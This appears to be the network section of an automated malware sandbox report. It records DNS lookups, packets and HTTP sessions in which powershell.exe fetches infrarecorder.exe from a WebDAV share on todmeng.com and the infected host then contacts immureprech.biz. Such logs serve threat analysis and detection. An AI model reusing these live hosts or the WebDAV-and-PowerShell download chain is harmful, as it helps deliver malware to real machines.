Dec 13, 2024 16:43:57.297780991 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:57.297794104 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:58.552911043 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:58.553019047 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:58.595350027 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:58.595370054 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:58.596205950 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:58.597671986 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:58.597959995 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:58.598011017 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:59.342492104 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:59.342586040 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:59.342637062 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:59.342951059 CET	49859	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:59.342979908 CET	443	49859	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:59.619160891 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:59.619205952 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:43:59.619278908 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:59.619750023 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:43:59.619770050 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:00.844508886 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:00.844722033 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:00.846096992 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:00.846117020 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:00.846484900 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:00.847964048 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:00.848151922 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:00.848186970 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:00.848248005 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:00.848257065 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:01.772424936 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:01.772689104 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:01.773003101 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:01.773765087 CET	49865	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:01.773782969 CET	443	49865	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:02.204535007 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:02.204591036 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:02.204688072 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:02.204998970 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:02.205013990 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:03.434866905 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:03.434940100 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:03.436228991 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:03.436249018 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:03.436495066 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:03.437695980 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:03.437767029 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:03.437779903 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:04.039416075 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:04.039674044 CET	443	49871	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:04.039729118 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:04.039729118 CET	49871	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:04.506138086 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:04.506170988 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:04.506264925 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:04.506625891 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:04.506637096 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.732207060 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.732299089 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.747864008 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.747884989 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.748718977 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.799949884 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.813034058 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.821803093 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.821883917 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.822007895 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.822058916 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.822160959 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.822432995 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.822556973 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.822592020 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.822721004 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.822758913 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.822896004 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.822937965 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.822951078 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.822995901 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.823205948 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.823246002 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.823306084 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.823638916 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.823683023 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.823704958 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.871330023 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:05.871494055 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.871543884 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.871567965 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:05.919327021 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:06.188450098 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:08.374955893 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:08.375068903 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:08.375188112 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:08.699800968 CET	49877	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:08.699826956 CET	443	49877	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:08.787909031 CET	49888	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:08.788024902 CET	443	49888	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:08.788113117 CET	49888	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:08.788727999 CET	49888	443	192.168.2.3	172.67.207.38
Dec 13, 2024 16:44:08.788758993 CET	443	49888	172.67.207.38	192.168.2.3
Dec 13, 2024 16:44:09.737571955 CET	49888	443	192.168.2.3	172.67.207.38

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 16:43:02.200825930 CET	61943	53	192.168.2.3	1.1.1.1
Dec 13, 2024 16:43:02.951324940 CET	53	61943	1.1.1.1	192.168.2.3
Dec 13, 2024 16:43:08.737108946 CET	50330	53	192.168.2.3	1.1.1.1
Dec 13, 2024 16:43:09.451808929 CET	53	50330	1.1.1.1	192.168.2.3
Dec 13, 2024 16:43:13.649660110 CET	63661	53	192.168.2.3	1.1.1.1
Dec 13, 2024 16:43:13.788579941 CET	53	63661	1.1.1.1	192.168.2.3
Dec 13, 2024 16:43:31.649247885 CET	57436	53	192.168.2.3	1.1.1.1
Dec 13, 2024 16:43:32.043951035 CET	53	57436	1.1.1.1	192.168.2.3
Dec 13, 2024 16:43:33.537134886 CET	62168	53	192.168.2.3	1.1.1.1
Dec 13, 2024 16:43:33.674881935 CET	53	62168	1.1.1.1	192.168.2.3
Dec 13, 2024 16:43:49.764554024 CET	51639	53	192.168.2.3	1.1.1.1
Dec 13, 2024 16:43:49.901736975 CET	53	51639	1.1.1.1	192.168.2.3
Dec 13, 2024 16:43:49.905674934 CET	53833	53	192.168.2.3	1.1.1.1
Dec 13, 2024 16:43:50.043121099 CET	53	53833	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 16:43:02.200825930 CET	192.168.2.3	1.1.1.1	0xb520	Standard query (0)	todmeng.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:08.737108946 CET	192.168.2.3	1.1.1.1	0x8a97	Standard query (0)	todmeng.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:13.649660110 CET	192.168.2.3	1.1.1.1	0xfe38	Standard query (0)	todmeng.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:31.649247885 CET	192.168.2.3	1.1.1.1	0x42f8	Standard query (0)	todmeng.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:33.537134886 CET	192.168.2.3	1.1.1.1	0x3840	Standard query (0)	todmeng.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:49.764554024 CET	192.168.2.3	1.1.1.1	0x41d9	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:49.905674934 CET	192.168.2.3	1.1.1.1	0xc962	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 16:43:00.056885004 CET	1.1.1.1	192.168.2.3	0x3c0f	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 16:43:00.056885004 CET	1.1.1.1	192.168.2.3	0x3c0f	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:02.951324940 CET	1.1.1.1	192.168.2.3	0xb520	No error (0)	todmeng.com		185.147.125.51	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:09.451808929 CET	1.1.1.1	192.168.2.3	0x8a97	No error (0)	todmeng.com		185.147.125.51	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:13.788579941 CET	1.1.1.1	192.168.2.3	0xfe38	No error (0)	todmeng.com		185.147.125.51	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:32.043951035 CET	1.1.1.1	192.168.2.3	0x42f8	No error (0)	todmeng.com		185.147.125.51	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:33.674881935 CET	1.1.1.1	192.168.2.3	0x3840	No error (0)	todmeng.com		185.147.125.51	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:49.901736975 CET	1.1.1.1	192.168.2.3	0x41d9	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:50.043121099 CET	1.1.1.1	192.168.2.3	0xc962	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 13, 2024 16:43:50.043121099 CET	1.1.1.1	192.168.2.3	0xc962	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

todmeng.com

immureprech.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49796	185.147.125.51	80	6152	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 16:43:32.192430019 CET	180	OUT	GET /webdav/infrarecorder.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 Host: todmeng.com Connection: Keep-Alive
Dec 13, 2024 16:43:33.535191059 CET	610	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 13 Dec 2024 15:43:33 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://todmeng.com/webdav/infrarecorder.exe Content-Length: 329 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 6f 64 6d 65 6e 67 2e 63 6f 6d 2f 77 65 62 64 61 76 2f 69 6e 66 72 61 72 65 63 6f 72 64 65 72 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://todmeng.com/webdav/infrarecorder.exe">here</a>.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.3	49715	185.147.125.51	443	8064	C:\Windows\System32\net.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:04 UTC	100	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: todmeng.com
2024-12-13 15:43:04 UTC	192	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:04 GMT Server: Apache/2.4.58 (Ubuntu) Allow: GET,POST,OPTIONS,HEAD Content-Length: 0 Connection: close Content-Type: httpd/unix-directory

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.3	49726	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:10 UTC	136	OUT	OPTIONS /webdav HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: todmeng.com
2024-12-13 15:43:11 UTC	227	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 13 Dec 2024 15:43:11 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://todmeng.com/webdav/ Content-Length: 313 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:11 UTC	313	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 6f 64 6d 65 6e 67 2e 63 6f 6d 2f 77 65 62 64 61 76 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://todmeng.com/webdav/">here</a>.</p><hr><address>Apache/2.4.58 (Ubuntu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.3	49732	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:12 UTC	137	OUT	OPTIONS /webdav/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: todmeng.com
2024-12-13 15:43:13 UTC	319	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 15:43:13 GMT Server: Apache/2.4.58 (Ubuntu) DAV: 1,2 DAV: <http://apache.org/dav/propset/fs/1> MS-Author-Via: DAV Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK Content-Length: 0 Connection: close Content-Type: httpd/unix-directory

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.3	49738	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:15 UTC	166	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:15 UTC	227	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 13 Dec 2024 15:43:15 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://todmeng.com/webdav/ Content-Length: 313 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:15 UTC	313	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 6f 64 6d 65 6e 67 2e 63 6f 6d 2f 77 65 62 64 61 76 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://todmeng.com/webdav/">here</a>.</p><hr><address>Apache/2.4.58 (Ubuntu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.3	49743	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:17 UTC	167	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:17 UTC	179	IN	HTTP/1.1 207 Multi-Status Date: Fri, 13 Dec 2024 15:43:17 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 838 Connection: close Content-Type: text/xml; charset="utf-8"
2024-12-13 15:43:17 UTC	838	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 0a 3c 44 3a 72 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3a 6c 70 31 3d 22 44 41 56 3a 22 20 78 6d 6c 6e 73 3a 6c 70 32 3d 22 68 74 74 70 3a 2f 2f 61 70 61 63 68 65 2e 6f 72 67 2f 64 61 76 2f 70 72 6f 70 73 2f 22 3e 0a 3c 44 3a 68 72 65 66 3e 2f 77 65 62 64 61 76 2f 3c 2f 44 3a 68 72 65 66 3e 0a 3c 44 3a 70 72 6f 70 73 74 61 74 3e 0a 3c 44 3a 70 72 6f 70 3e 0a 3c 6c 70 31 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 6c 70 31 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 0a 3c 6c 70 31 3a 63 72 65 61 74 69 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><D:multistatus xmlns:D="DAV:"><D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"><D:href>/webdav/</D:href><D:propstat><D:prop><lp1:resourcetype><D:collection/></lp1:resourcetype><lp1:creation

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.3	49750	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 15:43:19 UTC	197	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 77 65 62 64 61 76 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 5f 74 72 61 63 65 33 32 2e 61 6d 73 69 2e 63 73 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND /webdav/syscalls/amsi_trace32.amsi.csv HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: todmeng.com
2024-12-13 15:43:19 UTC	180	IN	HTTP/1.1 404 Not Found Date: Fri, 13 Dec 2024 15:43:19 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-12-13 15:43:19 UTC	274	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 6f 64 6d 65 6e 67 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at todmeng.com Port 443</addre

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.3	49749	185.147.125.51	443

Timestamp	Bytes transferred	Direction	Data
